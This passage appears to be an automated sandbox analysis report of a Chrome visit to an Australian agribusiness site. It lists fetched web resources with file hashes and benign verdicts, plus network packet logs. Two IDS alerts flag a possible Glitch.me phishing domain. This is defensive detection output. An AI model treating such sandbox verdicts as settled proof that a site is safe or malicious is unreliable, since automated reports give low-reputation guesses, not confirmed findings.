                                                                                                                                                                                                            URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAmo623_OFkT4RIFDQemLSw=?alt=proto
                                                                                                                                                                                                            Preview:CgkKBw0Hpi0sGgA=
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):211
                                                                                                                                                                                                            Entropy (8bit):4.969901501689543
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:tIsqDmJS4RKb5nJEWvoXSK7AASKcvXjXRHgAEvlQVA8cXbLErFWFAmYHZAAbBWah:tI9mc4slnJ/wXDcA4noZcR3mqZllWq4I
                                                                                                                                                                                                            MD5:E4765EF64FAAF1BFA94BC2D68A3B16E2
                                                                                                                                                                                                            SHA1:70EA0BEA959B765AF8A9874170CF71AEE903EDA0
                                                                                                                                                                                                            SHA-256:493A230BCE655674730B4F4AFD752658F24C0FE643001DAD61C1EE99D070E9C3
                                                                                                                                                                                                            SHA-512:355BD63D4BF814925B951DBFA950079378FAFBB7C95F4BABE46E0588272D866A91B74706C224672B26E32ACC638893C883C8611A5FC183E56575F17E15B65EC9
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            URL:https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-site/resources/images/svg/icon-down-arrow.svg
                                                                                                                                                                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" class="h-6 w-6" fill="none" viewBox="0 0 24 24" stroke="currentColor" stroke-width="2">. <path stroke-linecap="round" stroke-linejoin="round" d="M19 9l-7 7-7-7" />.</svg>
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2485)
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):25607
                                                                                                                                                                                                            Entropy (8bit):5.289358577334729
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:so/MPtWU9YwUpxbY/Y3YOgQYeYZYHYZYVY+YSYSyQGraO3e3Hbb18LAZx:RIT7sZwuvL54WAcl/1
                                                                                                                                                                                                            MD5:657DD9F012A6E099FC4122C638885DA1
                                                                                                                                                                                                            SHA1:7D9C8E2E52F896833239CE6F35FE71FDBEBFFC9F
                                                                                                                                                                                                            SHA-256:DA2726D825AD933EB9050F7D5B1A5085C5B0544BDB981A3A95D65835D6CF42A9
                                                                                                                                                                                                            SHA-512:CE355ED58D8F4114CE03F75DFC713358065EC8F3F736E1CD3AEC65228BD3AD7CC3BE445B4FE9F6F97A9B14524E522C09E44FE493E15887DC2985EA34BEC0D10D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            URL:https://connect.facebook.net/signals/config/253007270729203?v=2.9.176&r=stable&domain=elders.com.au&hme=872f04a0547459b3285cb03b0d7a47bfde40628f4b386809918a621e2688602f&ex_m=70%2C121%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C172%2C175%2C187%2C183%2C184%2C186%2C29%2C101%2C53%2C77%2C185%2C167%2C170%2C180%2C181%2C188%2C131%2C41%2C189%2C190%2C34%2C143%2C15%2C50%2C195%2C194%2C133%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C168%2C171%2C140%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113%2C201%2C200%2C202%2C207%2C208%2C209%2C205%2C197%2C132%2C134%2C163%2C196%2C198%2C122%2C157%2C145%2C151%2C129%2C233%2C116%2C126%2C127%2C234%2C165%2C119%2C236%2C166%2C136%2C123%2C154%2C148%2C193%2C114%2C128
                                                                                                                                                                                                            Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (3138)
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):3284
                                                                                                                                                                                                            Entropy (8bit):5.456630983929297
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:PY9+qw87WpFtuOXMfUFyJZAeNeMqOIDcgjHQ0jOpXSHVajXKCw1tngEo:P2+qJWpFtu4MvX0Mb0jOpXOCN
                                                                                                                                                                                                            MD5:BB4B6453E3AB80111A2B227318D22EFB
                                                                                                                                                                                                            SHA1:B65D59B9AA2B883EBDBE299E9CD40EA4CA642451
                                                                                                                                                                                                            SHA-256:9A54E6B1253D785972CCAAB75A888119D13083BFB1F80343AEF9454D5CD5BB6D
                                                                                                                                                                                                            SHA-512:FCC97D7E510C9AA9BCB23046271AB83CC0B6BF986B1B03E83E5D5A201FA7DB0B96DA8B54C9192A2D5AF2C5CDB0CA555AFE3A9CFE94F45E4EDF433D7AC203BC98
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            URL:https://assets.adobedtm.com/extensions/EP8757b503532a44a68eee17773f6f10a0/AppMeasurement_Module_ActivityMap.min.js
                                                                                                                                                                                                            Preview:// For license information, see `https://assets.adobedtm.com/extensions/EP8757b503532a44a68eee17773f6f10a0/AppMeasurement_Module_ActivityMap.js`..function AppMeasurement_Module_ActivityMap(e){function t(){var e=s.pageYOffset+(s.innerHeight||0);e&&e>+f&&(f=e)}function n(){if(l.scrollReachSelector){var t=e.d.querySelector&&e.d.querySelector(l.scrollReachSelector);t?(f=t.scrollTop||0,t.addEventListener("scroll",(function(){var e;(e=t&&t.scrollTop+t.clientHeight||0)>f&&(f=e)}))):0<g--&&setTimeout(n,1e3)}}function r(e,t){var n,r,i;if(e&&t&&(n=l.c[t]||(l.c[t]=t.split(","))))for(i=0;i<n.length&&(r=n[i++]);)if(-1<e.indexOf(r))return null;return e}function i(t,n,r,i,a){var c,o;if((t.dataset&&(o=t.dataset[n])||t.getAttribute&&((o=t.getAttribute("data-"+r))||(o=t.getAttribute(r))))&&(c=o),!c&&e.useForcedLinkTracking&&a){var l;if(t=t.onclick?""+t.onclick:"",n="",i&&t&&0<=(r=t.indexOf(i))){for(r+=i.length;r<t.length;)if(o=t.charAt(r++),0<="'\"".indexOf(o)){l=o;break}for(var s=!1;r<t.length&&l&&(o=t
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1226
                                                                                                                                                                                                            Entropy (8bit):4.647801139486787
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:tYU/dutm7ivbWXQ8N4+2NGqRB7tFHPbUla35cFsJcrEKHb:n/TWvaqR5fHTYa35cua
                                                                                                                                                                                                            MD5:5FEF43A945FA6C8242FC795D0C8DDC9D
                                                                                                                                                                                                            SHA1:752A33F4C5B89F7E2C02B5A8EE5EF6089924C392
                                                                                                                                                                                                            SHA-256:911E4F035C61ADBB2CDCE5A5C1DAAB5763DFB6C5A1880A0EEA308741CA2126C5
                                                                                                                                                                                                            SHA-512:9A4D4A6E2ED578437626727DC6231D781507103AC22F8B994A906DBFC46B30AF784B7C37DD1238FFA01122728E699DDCC56932B6436C120ED0C4231D6647AACE
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Preview:<svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_8407_13472)">.<path d="M7.5 22.5C8.32843 22.5 9 21.8284 9 21C9 20.1716 8.32843 19.5 7.5 19.5C6.67157 19.5 6 20.1716 6 21C6 21.8284 6.67157 22.5 7.5 22.5Z" fill="#2A2B2D"/>.<path d="M18 22.5C18.8284 22.5 19.5 21.8284 19.5 21C19.5 20.1716 18.8284 19.5 18 19.5C17.1716 19.5 16.5 20.1716 16.5 21C16.5 21.8284 17.1716 22.5 18 22.5Z" fill="#2A2B2D"/>.<path d="M21 5.24991H4.365L3.75 2.09991C3.71494 1.92795 3.62068 1.77374 3.48364 1.6641C3.3466 1.55447 3.17546 1.49637 3 1.49991H0V2.99991H2.385L5.25 17.3999C5.28506 17.5719 5.37932 17.7261 5.51636 17.8357C5.6534 17.9453 5.82454 18.0034 6 17.9999H19.5V16.4999H6.615L6 13.4999H19.5C19.6734 13.5041 19.8429 13.4482 19.9796 13.3415C20.1163 13.2348 20.2119 13.0841 20.25 12.9149L21.75 6.16491C21.7751 6.05363 21.7745 5.93808 21.7483 5.82706C21.722 5.71604 21.6708 5.61247 21.5985 5.52424C21.5261 5.436 21.4347 5.36543 21.3309 5.3179C21.227
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (3138)
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3284
                                                                                                                                                                                                            Entropy (8bit):5.456630983929297
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:PY9+qw87WpFtuOXMfUFyJZAeNeMqOIDcgjHQ0jOpXSHVajXKCw1tngEo:P2+qJWpFtu4MvX0Mb0jOpXOCN
                                                                                                                                                                                                            MD5:BB4B6453E3AB80111A2B227318D22EFB
                                                                                                                                                                                                            SHA1:B65D59B9AA2B883EBDBE299E9CD40EA4CA642451
                                                                                                                                                                                                            SHA-256:9A54E6B1253D785972CCAAB75A888119D13083BFB1F80343AEF9454D5CD5BB6D
                                                                                                                                                                                                            SHA-512:FCC97D7E510C9AA9BCB23046271AB83CC0B6BF986B1B03E83E5D5A201FA7DB0B96DA8B54C9192A2D5AF2C5CDB0CA555AFE3A9CFE94F45E4EDF433D7AC203BC98
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Preview:// For license information, see `https://assets.adobedtm.com/extensions/EP8757b503532a44a68eee17773f6f10a0/AppMeasurement_Module_ActivityMap.js`..function AppMeasurement_Module_ActivityMap(e){function t(){var e=s.pageYOffset+(s.innerHeight||0);e&&e>+f&&(f=e)}function n(){if(l.scrollReachSelector){var t=e.d.querySelector&&e.d.querySelector(l.scrollReachSelector);t?(f=t.scrollTop||0,t.addEventListener("scroll",(function(){var e;(e=t&&t.scrollTop+t.clientHeight||0)>f&&(f=e)}))):0<g--&&setTimeout(n,1e3)}}function r(e,t){var n,r,i;if(e&&t&&(n=l.c[t]||(l.c[t]=t.split(","))))for(i=0;i<n.length&&(r=n[i++]);)if(-1<e.indexOf(r))return null;return e}function i(t,n,r,i,a){var c,o;if((t.dataset&&(o=t.dataset[n])||t.getAttribute&&((o=t.getAttribute("data-"+r))||(o=t.getAttribute(r))))&&(c=o),!c&&e.useForcedLinkTracking&&a){var l;if(t=t.onclick?""+t.onclick:"",n="",i&&t&&0<=(r=t.indexOf(i))){for(r+=i.length;r<t.length;)if(o=t.charAt(r++),0<="'\"".indexOf(o)){l=o;break}for(var s=!1;r<t.length&&l&&(o=t
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:PNG image data, 128 x 128, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7278
                                                                                                                                                                                                            Entropy (8bit):7.955250971064799
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:78Qon1iBTWfFKJFhMFyLJxvQkNBjbUKTnFrKt43GkiHc4mDBSOPDaAxwGlnyQd4E:YsWiMFypNBM0ntKq2jEozgH0J+9S6hZ
                                                                                                                                                                                                            MD5:7D00F629EF06E4C02623BAB31806FF6C
                                                                                                                                                                                                            SHA1:4E70D5EFA7B9D28CF0D07BBD7D17C746933F6055
                                                                                                                                                                                                            SHA-256:553C5F482899857DA3DE9D2707A3A5F88777546BAE48B4534B801188420C9602
                                                                                                                                                                                                            SHA-512:8350FCEA21EA2C98CE8278DD3677890D9C4DC134BF03F397D2BDFC1231C8A2BA8CD464D5A20B5762FDECB9C460CC5B1E103C3398467B2BB9433406896278DE0E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Preview:.PNG........IHDR.............L\.....5IDATx...._U...>..{.._..H.*.. ..... ..).r@.@.UE)..... ....E.s.H.]b...*..C.C dN.K.^.....{....^.b:.....X..~..s.t..y.@G..........fu..Y..mV.@....fu..Y..mV.@....fu..Y..mV.@....fu..Y..mV.@....fu..Y..mV.@....fu..Y..mV.@....fu..Y..mV.@....fu..Y..mV.@....fu..Y..mV.@....fu..Y..m.~E?.............#.@..E@..x=. ....}E..U.W.@...).`T...0.T.l../..@$ ..bx...w....._...?~..@.......O.W..^-...`....6...."7...X.......:.._.<1#..=.~?...[G..0........:9`..i....L..*.. b...1D(!.t^.i/..s.^.E.,..B<.`.. .A.L.@....K ..d..G...;I..(.`E...vV..X..@Q-...)...8B.....n..p@${.....9.t....$....J.....E.i..^.K{5..P.{.."..7.n.<.KK..j...s@+...e]TO..TydT..n..L.~E..U.....IxwT.-!...z""...f...V=)...h.`e.o...w&.."..!....JH..z.Jsp.JvL.'....*Wk.h.D.S.N.vL+v..cK.j..I.e......(..<.)......$...FX~.TX...{Bu.q.H....-.$O9V..t....q./?..c.....]E3PQ.b.0..W....f%^D..V[..%.F...hT........@.E.B.F"..5E,.....N3..}.*Gq.U..*....e...~...P.4S\...\."."V..K..L..4A.d ...<DE\.5$..G..
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (41034)
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):2127266
                                                                                                                                                                                                            Entropy (8bit):5.423974454035628
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:49152:D5hGMshdG4FZlZA1ehHIn0R2QMs9N5LpAORryGG4lQeUmOxkSyi7rO38dmYFqzFY:Bl
                                                                                                                                                                                                            MD5:3D0EB1CE53FB55BB5540E2CD4AABBACF
                                                                                                                                                                                                            SHA1:1192128760568CB569FC9A9463114DE6FBD2DF85
                                                                                                                                                                                                            SHA-256:53CD19A14D1E2B0413E84D6030E339E1F0D997622DC31B92E0A164A357ED227F
                                                                                                                                                                                                            SHA-512:6C84268726BA141B9A7865FE8847DAD152C60CD1ECB74D47EC688ED011E91ED214A0A8ED19B0A596898797A4AB12085CFF6C00871A8165D5A258C2A5F560513D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            URL:https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-react.lc-3d0eb1ce53fb55bb5540e2cd4aabbacf-lc.min.css
                                                                                                                                                                                                            Preview:@charset "UTF-8";@keyframes react-loading-skeleton{to{transform:translateX(100%)}}.react-loading-skeleton{--base-color:#ebebeb;--highlight-color:#f5f5f5;--animation-duration:1.5s;--animation-direction:normal;--pseudo-element-display:block;background-color:var(--base-color);width:100%;border-radius:.25rem;display:inline-flex;line-height:1;position:relative;-webkit-user-select:none;-moz-user-select:none;user-select:none;overflow:hidden}.react-loading-skeleton:after{content:" ";display:var(--pseudo-element-display);position:absolute;top:0;left:0;right:0;height:100%;background-repeat:no-repeat;background-image:linear-gradient(90deg,var(--base-color),var(--highlight-color) 50%,var(--base-color));background-image:var(--custom-highlight-background,linear-gradient(90deg,var(--base-color),var(--highlight-color) 50%,var(--base-color)));transform:translateX(-100%);animation-name:react-loading-skeleton;animation-direction:var(--animation-direction);animation-duration:var(--animation-duration);anim
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:PNG image data, 128 x 128, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):7278
                                                                                                                                                                                                            Entropy (8bit):7.955250971064799
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:78Qon1iBTWfFKJFhMFyLJxvQkNBjbUKTnFrKt43GkiHc4mDBSOPDaAxwGlnyQd4E:YsWiMFypNBM0ntKq2jEozgH0J+9S6hZ
                                                                                                                                                                                                            MD5:7D00F629EF06E4C02623BAB31806FF6C
                                                                                                                                                                                                            SHA1:4E70D5EFA7B9D28CF0D07BBD7D17C746933F6055
                                                                                                                                                                                                            SHA-256:553C5F482899857DA3DE9D2707A3A5F88777546BAE48B4534B801188420C9602
                                                                                                                                                                                                            SHA-512:8350FCEA21EA2C98CE8278DD3677890D9C4DC134BF03F397D2BDFC1231C8A2BA8CD464D5A20B5762FDECB9C460CC5B1E103C3398467B2BB9433406896278DE0E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            URL:https://logo.clearbit.com/elders.com.au
                                                                                                                                                                                                            Preview:.PNG........IHDR.............L\.....5IDATx...._U...>..{.._..H.*.. ..... ..).r@.@.UE)..... ....E.s.H.]b...*..C.C dN.K.^.....{....^.b:.....X..~..s.t..y.@G..........fu..Y..mV.@....fu..Y..mV.@....fu..Y..mV.@....fu..Y..mV.@....fu..Y..mV.@....fu..Y..mV.@....fu..Y..mV.@....fu..Y..mV.@....fu..Y..mV.@....fu..Y..m.~E?.............#.@..E@..x=. ....}E..U.W.@...).`T...0.T.l../..@$ ..bx...w....._...?~..@.......O.W..^-...`....6...."7...X.......:.._.<1#..=.~?...[G..0........:9`..i....L..*.. b...1D(!.t^.i/..s.^.E.,..B<.`.. .A.L.@....K ..d..G...;I..(.`E...vV..X..@Q-...)...8B.....n..p@${.....9.t....$....J.....E.i..^.K{5..P.{.."..7.n.<.KK..j...s@+...e]TO..TydT..n..L.~E..U.....IxwT.-!...z""...f...V=)...h.`e.o...w&.."..!....JH..z.Jsp.JvL.'....*Wk.h.D.S.N.vL+v..cK.j..I.e......(..<.)......$...FX~.TX...{Bu.q.H....-.$O9V..t....q./?..c.....]E3PQ.b.0..W....f%^D..V[..%.F...hT........@.E.B.F"..5E,.....N3..}.*Gq.U..*....e...~...P.4S\...\."."V..K..L..4A.d ...<DE\.5$..G..
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (5552)
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):77539
                                                                                                                                                                                                            Entropy (8bit):5.320879390119302
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:RJeUwT76HXhpwPCHM9ZVK01QqSYTZ02LKVsdmpyKcicPl:RIT7OXVs9ZVKBvYj8wKcHPl
                                                                                                                                                                                                            MD5:17498360325E61C7C66CC6FBF120C83A
                                                                                                                                                                                                            SHA1:21F70F088F62213BE82B9A79B0EB379272076288
                                                                                                                                                                                                            SHA-256:3981A5BC7726C881BA01D63DBD2A15B0CD6B463D619ECF1A9DA1387C779FE436
                                                                                                                                                                                                            SHA-512:807E7D7F610D2F419C6F948DFC518B661DCF3ED56DD47D4D3F35CF7DF1EE5EDA32809638193D780B0B5D2AF9C4D63BDAADAADC96D4902FAC47ED642177686CF4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (793)
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):309403
                                                                                                                                                                                                            Entropy (8bit):5.08553909553394
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:qWP/hfR3+x226XfKuaKdrGDrDw4QZt7waFiP8GskIz8qDBp:qWPAw4QZt7waFiP8GskIz8qDb
                                                                                                                                                                                                            MD5:60038E123DF28EA326DA7B93DFC6BC75
                                                                                                                                                                                                            SHA1:480E89BDB8A61FCA7EDF4674B2682B8022ED89AB
                                                                                                                                                                                                            SHA-256:ABE71806906E6CC61DA6A1E8B41C1E16078E081C73F85A8C7A29DE65957D10BB
                                                                                                                                                                                                            SHA-512:B5568DA69E0B779979E09C840DA489FE8DACB27AC2A38A70AC22AE568D5F236EEC049CCE18599580094241F192665648A08D39A811B60C768340B8E70E017AFF
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            URL:https://elders.com.au/etc.clientlibs/aap2/aap2-core/clientlibs/v2/ax-fx-clientlibs-head.lc-60038e123df28ea326da7b93dfc6bc75-lc.min.css
                                                                                                                                                                                                            Preview::root{--bs-blue:#0d6efd;--bs-indigo:#6610f2;--bs-purple:#6f42c1;--bs-pink:#d63384;--bs-red:#dc3545;--bs-orange:#fd7e14;--bs-yellow:#ffc107;--bs-green:#198754;--bs-teal:#20c997;--bs-cyan:#0dcaf0;--bs-white:#fff;--bs-gray:#6c757d;--bs-gray-dark:#343a40;--bs-primary:#0d6efd;--bs-secondary:#6c757d;--bs-success:#198754;--bs-info:#0dcaf0;--bs-warning:#ffc107;--bs-danger:#dc3545;--bs-light:#f8f9fa;--bs-dark:#212529;--bs-font-sans-serif:system-ui,-apple-system,"Segoe UI",Roboto,"Helvetica Neue",Arial,"Noto Sans","Liberation Sans",sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";--bs-font-monospace:SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace;--bs-gradient:linear-gradient(180deg,rgba(255,255,255,0.15),rgba(255,255,255,0))}.*,*::before,*::after{box-sizing:border-box}.@media(prefers-reduced-motion:no-preference){:root{scroll-behavior:smooth}.}.body{margin:0;font-family:var(--bs-font-sans-serif);font-size:1rem;font-weight:400;li
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):9
                                                                                                                                                                                                            Entropy (8bit):2.94770277922009
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:mn:mn
                                                                                                                                                                                                            MD5:722969577A96CA3953E84E3D949DEE81
                                                                                                                                                                                                            SHA1:3DAB5F6012E3E149B5A939B9CEBBA4A0B84DC8F5
                                                                                                                                                                                                            SHA-256:78342A0905A72CE44DA083DCB5D23B8EA0C16992BA2A82EECE97E033D76BA3D3
                                                                                                                                                                                                            SHA-512:54B2B4596CD1769E46A12A0CA6EDE70468985CF8771C2B11E75B3F52567A64418BC24C067D96D52037E0E135E7A7FF828AD0241D55B827506E1C67DE1CAEE8BC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            URL:https://kit.fontawesome.com/f6136e9b49.js
                                                                                                                                                                                                            Preview:Forbidden
                                                                                                                                                                                                            No static file info
                                                                                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                            2024-11-06T06:28:42.938552+01002029493ET PHISHING Possible Glitch.me Phishing Domain1192.168.2.4605991.1.1.153UDP
                                                                                                                                                                                                            2024-11-06T06:28:42.938844+01002029493ET PHISHING Possible Glitch.me Phishing Domain1192.168.2.4497831.1.1.153UDP
                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                            Nov 6, 2024 06:28:32.754010916 CET49675443192.168.2.4173.222.162.32
                                                                                                                                                                                                            Nov 6, 2024 06:28:42.362302065 CET49675443192.168.2.4173.222.162.32
                                                                                                                                                                                                            Nov 6, 2024 06:28:42.957221985 CET49735443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:42.957283020 CET4434973554.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:42.957361937 CET49735443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:42.957532883 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:42.957561016 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:42.957628965 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:42.957745075 CET49735443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:42.957767010 CET4434973554.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:42.957963943 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:42.957973957 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:43.793416977 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:43.793430090 CET4434973554.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:43.793860912 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:43.793862104 CET49735443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:43.793885946 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:43.793893099 CET4434973554.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:43.794785023 CET4434973554.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:43.794848919 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:43.794852972 CET49735443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:43.794907093 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:43.795928955 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:43.795991898 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:43.796050072 CET49735443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:43.796112061 CET4434973554.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:43.796331882 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:43.796338081 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:43.849710941 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:43.849716902 CET49735443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:43.849742889 CET4434973554.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:43.895210981 CET49735443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:44.162349939 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:44.162384033 CET4434973654.91.146.110192.168.2.4
